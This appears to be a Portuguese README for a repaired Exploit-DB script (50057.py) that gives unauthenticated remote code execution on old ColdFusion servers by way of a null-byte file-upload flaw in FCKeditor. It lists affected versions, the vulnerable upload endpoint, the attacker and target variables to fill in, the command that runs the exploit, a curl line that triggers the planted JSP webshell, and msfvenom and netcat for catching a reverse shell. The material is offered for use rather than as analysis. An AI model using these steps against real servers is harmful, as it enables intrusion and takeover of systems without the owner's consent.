
correção para script de exploit que não funciona no exploitdb (50057.py)
Execução remota de código não autenticada por meio de upload arbitrário de arquivos no componente FCKeditor incluído no ColdFusion. O endpoint de upload de arquivos aceita uma injeção de byte nulo no parâmetro filename, permitindo que um webshell JSP seja enviado e executado diretamente pelo servidor.
| Versão | Status |
|---|
| ColdFusion 8.0 | Vulnerável |
| ColdFusion 8.0.1 | Vulnerável |
| ColdFusion 9.0 | Vulnerável* |
| ColdFusion MX 6.x | Vulnerável |
| ColdFusion MX 7.x | Vulnerável |
| ColdFusion 9.0.1+ | Corrigido |
| ColdFusion 10+ | Não afetado |
*ColdFusion 9.0 vulnerável se o componente FCKeditor não for removido/atualizado.
Patch: Adobe Security Bulletin APSB09-09 (julho de 2009).
Edite as variáveis no topo do script:
lhost = 'YOUR_IP'
lport = 4444
rhost = 'TARGET_IP'
rport = 8500
Execute:
python3 poc.py
O script irá:
Se o shell não chegar em alguns segundos, acione-o manualmente:
curl http://<rhost>:<rport>/userfiles/file/<filename>.jsp
O nome do arquivo é impresso em stdout após o upload.
msfvenom
netcat (nc)
python3
/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm